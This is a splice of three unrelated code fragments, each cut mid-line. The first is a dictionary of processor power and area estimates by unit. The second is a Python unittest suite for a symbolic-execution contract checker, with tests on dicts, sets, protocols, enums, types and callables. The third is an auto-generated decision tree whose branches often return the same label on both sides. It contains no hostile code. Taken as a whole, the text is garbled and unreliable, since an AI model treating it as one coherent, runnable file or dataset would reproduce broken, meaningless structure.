'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0701617,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.295336,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0985609,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.01561,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0036146,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0261383,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0267322,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0261383,
'Execution Unit/Register Files/Runtime Dynamic': 0.0303468,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0550661,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.160511,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.09426,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000448729,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000448729,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000394054,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000154301,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00038401,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00167552,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00418763,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0256983,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.63463,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.050506,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0872831,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.93248,
'Instruction Fetch Unit/Runtime Dynamic': 0.169351,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0299709,
'L2/Runtime Dynamic': 0.00737748,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.24019,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.492783,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0324516,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0324515,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.39343,
'Load Store Unit/Runtime Dynamic': 0.685274,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.08002,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.16004,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0283994,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0288489,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.101635,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.00828113,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.306529,
'Memory Management Unit/Runtime Dynamic': 0.0371301,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 14.2675,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00388802,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0454017,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming | |
else:
_val = d[s] # type: ignore
return True
self.assertEqual(*check_ok(f))
def test_dict_key_type_union(self) -> None:
def f(d: Dict[Union[int, str], int]) -> Dict:
"""
pre: len(d) == 2
post: not (42 in d and '42' in d)
"""
return d
self.assertEqual(*check_fail(f))
def test_nonuniform_dict_types(self) -> None:
def f(a: Dict[Hashable, int]) -> Dict[Hashable, int]:
"""
pre: len(a) == 1
post: _[0] == 100
"""
b: Dict[Hashable, int] = {0: 100}
b.update(a)
return b
self.assertEqual(*check_fail(f))
def test_dicts_inside_lists(self) -> None:
def f(dicts: List[Dict[int, int]]) -> Dict[int, int]:
"""
pre: len(dicts) <= 1 # to narrow search space (would love to make this larger)
post: len(_) <= len(dicts)
"""
ret = {}
for d in dicts:
ret.update(d)
return ret
self.assertEqual(*check_fail(f))
def test_dicts_inside_lists_with_identity(self) -> None:
# NOTE: the message is a little confusing because repr()
# hides the fact that the identity of the lists is the same.
def f(dicts: List[Dict[int, int]]):
"""
Removes duplicate keys.
pre: len(dicts) == 2
pre: len(dicts[0]) == 1
post: len(dicts[0]) == 1
"""
seen: Set[int] = set()
for d in dicts:
for k in d.keys():
if k in seen:
del d[k]
else:
seen.add(k)
self.assertEqual(*check_fail(f))
def test_consistent_ordering(self) -> None:
def f(symbolic: Dict[int, int]) -> Tuple[List[int], List[int]]:
""" post: _[0] == _[1] """
return (list(symbolic.keys()), list(symbolic.keys()))
self.assertEqual(*check_unknown(f))
def test_ordering_after_mutations(self) -> None:
def f(d: Dict[int, int]) -> Tuple[Tuple[int, int], Tuple[int, int]]:
"""
pre: len(d) == 3
post[d]: _[0] == _[1]
"""
o1, middle, o2 = d.keys()
d[o1] = 42
d[o2] = 42
del d[middle]
n1, n2 = d.keys()
return ((o1, o2), (n1, n2))
self.assertEqual(*check_ok(f))
def test_alternate_mapping_types(self) -> None:
def f(m1: Mapping[int, int], m2: MutableMapping[int, int]) -> int:
"""
pre: 1 in m1 and 2 in m2
post: _ != 10
"""
return m1[1] + m2[2]
self.assertEqual(*check_fail(f))
def test_implicit_conversion_for_keys(self) -> None:
def f(m: Dict[float, float], b: bool, i: int):
"""
post: len(m) >= len(__old__.m)
"""
m[b] = 2.0
m[i] = 3.0
self.assertEqual(*check_ok(f))
if sys.version_info >= (3, 8):
def test_typed_dict_fail(self) -> None:
def f(td: Movie):
''' post: _['year'] != 2020 or _['name'] != "hi"'''
return td
self.assertEqual(*check_fail(f))
class SetsTest(unittest.TestCase):
def test_basic_fail(self) -> None:
def f(a: Set[int], k: int) -> None:
"""
post[a]: k+1 in a
"""
a.add(k)
self.assertEqual(*check_fail(f))
def test_basic_ok(self) -> None:
def f(a: Set[int], k: int) -> None:
"""
post[a]: k in a
"""
a.add(k)
self.assertEqual(*check_ok(f))
def test_union_fail(self) -> None:
def f(a: Set[str], b: Set[str]) -> Set[str]:
"""
pre: len(a) == len(b) == 1 # (just for test performance)
post: all(((i in a) and (i in b)) for i in _)
"""
return a | b
self.assertEqual(*check_fail(f))
def test_union_ok(self) -> None:
def f(a: Set[str], b: Set[str]) -> Set[str]:
"""
post: all(((i in a) or (i in b)) for i in _)
"""
return a | b
self.assertEqual(*check_unknown(f))
def test_contains_different_but_equivalent(self) -> None:
def f(s: Set[Union[int, str]]) -> str:
"""
pre: "foobar" in s
post: (_ + "bar") in s
"""
return "foo"
self.assertEqual(*check_unknown(f))
# The heaprefs + deferred set assumptions make this too expensive.
# TODO: Optimize & re-enable
def TODO_test_subtype_union(self) -> None:
def f(s: Set[Union[int, str]]) -> Set[Union[int, str]]:
""" post: not ((42 in s) and ('42' in s)) """
return s
self.assertEqual(*check_fail(f, AnalysisOptionSet(per_condition_timeout=7.0)))
def test_subset_compare_ok(self) -> None:
# a >= b with {'a': {0.0, 1.0}, 'b': {2.0}}
def f(s1: Set[float], s2: Set[float]) -> bool:
"""
pre: s1 == {0.0, 1.0}
pre: s2 == {2.0}
post: not _
"""
return s1 >= s2
self.assertEqual(*check_ok(f))
def test_set_numeric_promotion(self) -> None:
def f(i: int, s: Set[float]) -> bool:
"""
pre: i == 2
pre: s == {2.0}
post: _
"""
return i in s
self.assertEqual(*check_ok(f))
def test_set_runtime_type_ok(self) -> None:
def f(s: set) -> bool:
""" post: _ """
return True
self.assertEqual(*check_ok(f))
def test_isinstance_check(self) -> None:
def f(s: Set[object]) -> bool:
""" post: _ """
return isinstance(s, set)
self.assertEqual(*check_ok(f))
def test_sets_eq(self) -> None:
def f(a: Set[FrozenSet[int]]) -> object:
"""
pre: a == {frozenset({7}), frozenset({42})}
post: _ in ('{frozenset({7}), frozenset({42})}', '{frozenset({42}), frozenset({7})}')
"""
return repr(a)
self.assertEqual(
*check_ok(
f, AnalysisOptionSet(per_path_timeout=10, per_condition_timeout=10)
)
)
def test_containment(self) -> None:
def f(s: Set[int]) -> int:
"""
pre: len(s) == 2
post: _
"""
i = iter(s)
x = next(i)
y = next(i)
return x != y
self.assertEqual(*check_ok(f))
class FunctionsTest(unittest.TestCase):
def test_hash(self) -> None:
def f(s: str) -> int:
""" post: True """
return hash(s)
self.assertEqual(*check_ok(f))
def test_getattr(self) -> None:
class Otter:
def do_cute_human_things_with_hands(self) -> str:
return "cuteness"
def f(s: str) -> str:
""" post: _ != "cuteness" """
try:
return getattr(Otter(), s)()
except:
return ""
messages = run_checkables(
analyze_function(
f, AnalysisOptionSet(max_iterations=20, per_condition_timeout=5)
)
)
self.assertEqual(len(messages), 1)
self.assertEqual(
messages[0].message,
"false when calling f(s = 'do_cute_human_things_with_hands') (which returns 'cuteness')",
)
class ProtocolsTest(unittest.TestCase):
    """Checks for values constrained only by typing protocols / ABCs."""
    # TODO: move most of this into a collectionslib_test.py file

    def test_hashable_values_fail(self) -> None:
        # A combination hashing to a multiple of 10 should be discoverable.
        def f(b: bool, i: int, t: Tuple[str, ...], s: FrozenSet[float]) -> int:
            """ post: _ % 10 != 0 """
            return hash((i, t, s))
        self.assertEqual(*check_fail(f))

    def test_hashable_values_ok(self) -> None:
        # Equal tuples hash equal, but proving that in general is beyond the
        # solver: "unknown" is the expected verdict here.
        def f(a: Tuple[str, int, float, bool], b: Tuple[str, int, float, bool]) -> int:
            """ post: _ or not (a == b) """
            return hash(a) == hash(b)
        self.assertEqual(*check_unknown(f))

    def test_symbolic_hashable(self) -> None:
        # Python's % on a (possibly negative) hash still yields 0 or 1.
        def f(a: Hashable) -> int:
            """ post[]: 0 <= _ <= 1 """
            return hash(a) % 2
        self.assertEqual(*check_ok(f))

    def test_symbolic_supports(self) -> None:
        # Every Supports* protocol must be realizable; a positive total then
        # disproves the postcondition.
        def f(
            a: SupportsAbs,
            f: SupportsFloat,
            i: SupportsInt,
            r: SupportsRound,
            c: SupportsComplex,
            b: SupportsBytes,
        ) -> float:
            """ post: _.real <= 0 """
            return abs(a) + float(f) + int(i) + round(r) + complex(c) + len(bytes(b))
        self.assertEqual(*check_fail(f))

    def test_iterable(self) -> None:
        T = TypeVar("T")
        def f(a: Iterable[T]) -> T:
            """
            pre: a
            post: _ in a
            """
            return next(iter(a))
        self.assertEqual(*check_unknown(f))

    def test_bare_type(self) -> None:
        # An unparameterized List annotation is accepted.
        def f(a: List) -> bool:
            """
            pre: a
            post: _
            """
            return bool(a)
        self.assertEqual(*check_ok(f))
class EnumsTest(unittest.TestCase):
    """Checks for symbolic enum values."""

    def test_enum_identity_matches_equality(self) -> None:
        # Enum members compare equal exactly when they are the same member.
        def f(color1: Color, color2: Color) -> bool:
            """ post: _ == (color1 is color2) """
            return color1 == color2
        self.assertEqual(*check_ok(f))

    def test_enum_in_container(self) -> None:
        # A list containing both RED and BLUE should be discoverable.
        def f(colors: List[Color]) -> bool:
            """ post: not _ """
            return Color.RED in colors and Color.BLUE in colors
        self.assertEqual(*check_fail(f))
class TypesTest(unittest.TestCase):
    """Checks for symbolic type objects (Type[...] parameters)."""

    def test_symbolic_types_ok(self) -> None:
        # Any realization of Type[SmokeDetector] is a SmokeDetector subclass.
        def f(typ: Type[SmokeDetector]):
            """ post: _ """
            return issubclass(typ, SmokeDetector)
        self.assertEqual(*check_ok(f))

    def test_symbolic_type_can_be_subclass(self) -> None:
        def f(typ: Type[Cat]):
            """ post: _ == "<class '__main__.Cat'>" """
            return str(typ)
        # False when the type is instantiated as "BiggerCat":
        self.assertEqual(*check_fail(f))

    def test_symbolic_types_fail(self) -> None:
        # An unconstrained Type need not be a str subclass.
        def f(typ: Type):
            """ post: _ """
            return issubclass(typ, str)
        self.assertEqual(*check_fail(f))

    def test_symbolic_types_without_literal_types(self) -> None:
        # Subclass relations between three fully symbolic types need not chain.
        def f(typ1: Type, typ2: Type, typ3: Type):
            """ post: implies(_, issubclass(typ1, typ3)) """
            return issubclass(typ2, typ3) and typ2 != typ3
        self.assertEqual(
            *check_fail(
                f, AnalysisOptionSet(max_iterations=60, per_condition_timeout=10)
            )
        )

    def test_instance_creation(self) -> None:
        # Instantiating a symbolic Type[Cat] yields a usable instance.
        def f(t: Type[Cat]):
            """ post: _.size() > 0 """
            return t()
        self.assertEqual(*check_ok(f))

    def test_type_comparison(self) -> None:
        # A symbolic type is not necessarily int.
        def f(t: Type) -> bool:
            """ post: _ """
            return t == int
        self.assertEqual(*check_fail(f))

    def test_type_as_bool(self) -> None:
        # Type objects are always truthy.
        def f(t: Type) -> bool:
            """ post: _ """
            return bool(t)
        self.assertEqual(*check_ok(f))

    def test_generic_object_and_type(self) -> None:
        # isinstance() against a symbolic type must not break the analysis.
        def f(thing: object, detector_kind: Type[SmokeDetector]):
            """ post: True """
            if isinstance(thing, detector_kind):
                return thing._is_plugged_in
            return False
        self.assertEqual(*check_ok(f))

    def test_generic_object_equality(self) -> None:
        # A symbolic object can be realized to equal a symbolic int.
        def f(thing: object, i: int):
            """ post: not _ """
            return thing == i
        self.assertEqual(*check_fail(f))
class CallableTest(unittest.TestCase):
    def test_symbolic_zero_arg_callable(self) -> None:
        # The solver must synthesize an initializer that returns 707.
        def f(size: int, initializer: Callable[[], int]) -> Tuple[int, ...]:
            """
            pre: size >= 1
            post: _[0] != 707
            """
            return tuple(initializer() for _ in range(size))
        self.assertEqual(*check_fail(f))
    def test_symbolic_one_arg_callable(self) -> None:
        # The solver must synthesize a mapfn with mapfn(0) == 707.
        def f(size: int, mapfn: Callable[[int], int]) -> Tuple[int, ...]:
            """
            pre: size >= 1
            post: _[0] != 707
            """
            return tuple(mapfn(i) for i in range(size))
        self.assertEqual(*check_fail(f))
    def test_symbolic_two_arg_callable(self) -> None:
        # A synthesized two-argument callable can return i for input (i, i).
        def f(i: int, callable: Callable[[int, int], int]) -> int:
            """ post: _ != i """
            return callable(i, i)
        self.assertEqual(*check_fail(f))
    def test_callable_as_bool(self) -> None:
        # Callables are always truthy.
        def f(fn: Callable[[int], int]) -> bool:
            """ post: _ """
            return bool(fn)
        self.assertEqual(*check_ok(f))
    def test_callable_repr(self) -> None:
        # The counterexample message shows the synthesized lambda's repr.
        def f(f1: Callable[[int], int]) -> int:
            """ post: _ != 1234 """
            return f1(4)
        messages = run_checkables(analyze_function(f))
        self.assertEqual(len(messages), 1)
        self.assertEqual(
            messages[0].message,
            "false when calling f(f1 = lambda a: 1234) (which returns 1234)",
        )
def | |
{"feature": "Education", "instances": 451, "metric_value": 0.3659, "depth": 8}
if obj[6]>1:
# {"feature": "Restaurant20to50", "instances": 273, "metric_value": 0.3959, "depth": 9}
if obj[10]<=1.0:
# {"feature": "Age", "instances": 157, "metric_value": 0.4229, "depth": 10}
if obj[4]>1:
# {"feature": "Children", "instances": 105, "metric_value": 0.4014, "depth": 11}
if obj[5]<=0:
# {"feature": "Bar", "instances": 63, "metric_value": 0.4263, "depth": 12}
if obj[8]>0.0:
# {"feature": "Gender", "instances": 46, "metric_value": 0.469, "depth": 13}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[8]<=0.0:
# {"feature": "Gender", "instances": 17, "metric_value": 0.2567, "depth": 13}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Bar", "instances": 42, "metric_value": 0.3347, "depth": 12}
if obj[8]<=1.0:
# {"feature": "Gender", "instances": 35, "metric_value": 0.3509, "depth": 13}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[8]>1.0:
# {"feature": "Gender", "instances": 7, "metric_value": 0.1905, "depth": 13}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=1:
# {"feature": "Bar", "instances": 52, "metric_value": 0.4354, "depth": 11}
if obj[8]>0.0:
# {"feature": "Gender", "instances": 30, "metric_value": 0.3873, "depth": 12}
if obj[3]<=0:
# {"feature": "Children", "instances": 21, "metric_value": 0.3627, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Children", "instances": 9, "metric_value": 0.4333, "depth": 13}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]<=0.0:
# {"feature": "Children", "instances": 22, "metric_value": 0.4886, "depth": 12}
if obj[5]>0:
# {"feature": "Gender", "instances": 14, "metric_value": 0.4898, "depth": 13}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[5]<=0:
# {"feature": "Gender", "instances": 8, "metric_value": 0.3571, "depth": 13}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Bar", "instances": 116, "metric_value": 0.3455, "depth": 10}
if obj[8]>0.0:
# {"feature": "Children", "instances": 96, "metric_value": 0.3098, "depth": 11}
if obj[5]<=0:
# {"feature": "Age", "instances": 67, "metric_value": 0.3515, "depth": 12}
if obj[4]>1:
# {"feature": "Gender", "instances": 36, "metric_value": 0.2487, "depth": 13}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[4]<=1:
# {"feature": "Gender", "instances": 31, "metric_value": 0.4367, "depth": 13}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 29, "metric_value": 0.1552, "depth": 12}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
# {"feature": "Age", "instances": 12, "metric_value": 0.3636, "depth": 13}
if obj[4]<=3:
return 'True'
elif obj[4]>3:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[8]<=0.0:
# {"feature": "Age", "instances": 20, "metric_value": 0.4484, "depth": 11}
if obj[4]<=4:
# {"feature": "Children", "instances": 13, "metric_value": 0.4103, "depth": 12}
if obj[5]>0:
# {"feature": "Gender", "instances": 12, "metric_value": 0.4333, "depth": 13}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
elif obj[4]>4:
# {"feature": "Gender", "instances": 7, "metric_value": 0.4898, "depth": 12}
if obj[3]<=1:
# {"feature": "Children", "instances": 7, "metric_value": 0.4898, "depth": 13}
if obj[5]<=1:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[6]<=1:
# {"feature": "Age", "instances": 178, "metric_value": 0.3119, "depth": 9}
if obj[4]>0:
# {"feature": "Bar", "instances": 161, "metric_value": 0.3267, "depth": 10}
if obj[8]<=3.0:
# {"feature": "Restaurant20to50", "instances": 155, "metric_value": 0.3162, "depth": 11}
if obj[10]>0.0:
# {"feature": "Gender", "instances": 132, "metric_value": 0.2974, "depth": 12}
if obj[3]>0:
# {"feature": "Children", "instances": 74, "metric_value": 0.3045, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Children", "instances": 58, "metric_value": 0.2807, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
# {"feature": "Gender", "instances": 23, "metric_value": 0.4099, "depth": 12}
if obj[3]<=0:
# {"feature": "Children", "instances": 16, "metric_value": 0.375, "depth": 13}
if obj[5]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Children", "instances": 7, "metric_value": 0.4762, "depth": 13}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>3.0:
# {"feature": "Restaurant20to50", "instances": 6, "metric_value": 0.25, "depth": 11}
if obj[10]<=1.0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.3333, "depth": 12}
if obj[3]>0:
# {"feature": "Children", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[5]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[10]>1.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]<=0:
# {"feature": "Gender", "instances": 17, "metric_value": 0.0882, "depth": 10}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
# {"feature": "Children", "instances": 4, "metric_value": 0.0, "depth": 11}
